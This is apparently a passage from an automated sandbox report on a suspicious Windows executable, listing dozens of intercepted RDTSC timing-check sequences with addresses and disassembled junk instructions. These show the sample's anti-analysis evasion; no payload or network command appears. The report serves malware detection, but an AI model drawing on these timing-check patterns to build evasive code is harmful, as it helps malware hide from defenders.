              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765479 second address: 76547D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76547D second address: 765498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F56AD341B25h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765602 second address: 765610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F56ACB76F38h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 767862 second address: 767878 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F56AD341B16h 0x00000008 jnc 00007F56AD341B16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 767878 second address: 767885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E0D4 second address: 76E0DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E261 second address: 76E265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E265 second address: 76E279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F56AD341B1Ch 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E279 second address: 76E285 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F56ACB76F36h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E285 second address: 76E28A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E28A second address: 76E298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F56ACB76F36h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E298 second address: 76E2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E2A2 second address: 76E2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F56ACB76F48h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E2B3 second address: 76E2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E6F6 second address: 76E6FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EF94 second address: 76EFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F56AD341B1Eh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FB82 second address: 76FB92 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F56ACB76F3Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FB92 second address: 76FB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FB96 second address: 76FBB1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F56ACB76F46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774D1C second address: 774D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F56AD341B16h 0x0000000a popad 0x0000000b jno 00007F56AD341B18h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774D2F second address: 774D3E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F56ACB76F3Ah 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774D3E second address: 774D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773D78 second address: 773DB1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007F56ACB76F45h 0x0000000f jmp 00007F56ACB76F3Dh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jmp 00007F56ACB76F48h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773DB1 second address: 773DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B24h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773EFE second address: 773F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774270 second address: 77427A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F56AD341B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7743A0 second address: 7743A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7743A4 second address: 7743CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F56AD341B1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jnp 00007F56AD341B16h 0x00000016 jmp 00007F56AD341B1Bh 0x0000001b pop esi 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7743CD second address: 7743DC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F56ACB76F3Ah 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774552 second address: 77455D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77455D second address: 774564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 774564 second address: 77459A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F56AD341B20h 0x00000008 jmp 00007F56AD341B22h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F56AD341B1Eh 0x00000017 jp 00007F56AD341B16h 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77459A second address: 7745D2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F56ACB76F4Fh 0x00000008 jmp 00007F56ACB76F49h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F56ACB76F45h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77472F second address: 774736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7794F3 second address: 7794F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4B37 second address: 6D4B3C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780B34 second address: 780B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780B3B second address: 780B45 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F56AD341B22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780B45 second address: 780B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780B4B second address: 780B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780B52 second address: 780B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7810D8 second address: 7810DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7810DD second address: 7810FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F56ACB76F48h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7810FB second address: 7810FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781583 second address: 781589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781589 second address: 781591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781857 second address: 78185B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78185B second address: 781863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781F1F second address: 781F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781F23 second address: 781F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781F29 second address: 781F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781F2F second address: 781F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7825F4 second address: 78260A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F41h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787C63 second address: 787C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787C67 second address: 787C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a ja 00007F56ACB76F36h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 jbe 00007F56ACB76F36h 0x0000001a pop eax 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787C82 second address: 787C87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787C87 second address: 787C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787DFB second address: 787E00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C55B0 second address: 6C55BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F56ACB76F3Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C55BF second address: 6C55CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C55CE second address: 6C55F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F56ACB76F48h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BB5A second address: 78BB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BB5E second address: 78BBA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F56ACB76F44h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F56ACB76F42h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BBA6 second address: 78BBAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79762E second address: 797632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797632 second address: 79763C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F56AD341B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7977A6 second address: 7977BA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F56ACB76F36h 0x00000008 ja 00007F56ACB76F36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7977BA second address: 7977BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7977BE second address: 7977C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7977C4 second address: 7977CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7977CD second address: 7977D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799CF5 second address: 799CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799CF9 second address: 799D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799D07 second address: 799D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CFB0F second address: 6CFB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CFB17 second address: 6CFB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7998A9 second address: 7998B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0D75 second address: 7A0D7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0D7F second address: 7A0D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8595 second address: 7A85AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Ch 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A85AF second address: 7A85CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Ch 0x00000009 popad 0x0000000a ja 00007F56ACB76F38h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A85CC second address: 7A85D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A85D2 second address: 7A85D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB035 second address: 7AB03B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CDEE7 second address: 6CDF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F56ACB76F48h 0x00000008 jne 00007F56ACB76F36h 0x0000000e jbe 00007F56ACB76F36h 0x00000014 popad 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007F56ACB76F42h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAE9C second address: 7AAEB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F56AD341B23h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B349C second address: 7B34A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2262 second address: 7B226A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B238C second address: 7B2390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2390 second address: 7B23AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F56AD341B24h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2773 second address: 7B2777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B31F6 second address: 7B31FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6D77 second address: 7B6D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F56ACB76F36h 0x0000000a jno 00007F56ACB76F36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6D89 second address: 7B6D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6A3D second address: 7B6A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6A45 second address: 7B6A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9DEE second address: 7B9E0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F56ACB76F38h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9E0B second address: 7B9E14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9E14 second address: 7B9E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9E1D second address: 7B9E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C18C4 second address: 7C18CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C18CA second address: 7C190F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F56AD341B16h 0x0000000a jbe 00007F56AD341B16h 0x00000010 popad 0x00000011 jo 00007F56AD341B28h 0x00000017 jmp 00007F56AD341B1Ch 0x0000001c js 00007F56AD341B16h 0x00000022 pushad 0x00000023 jmp 00007F56AD341B29h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
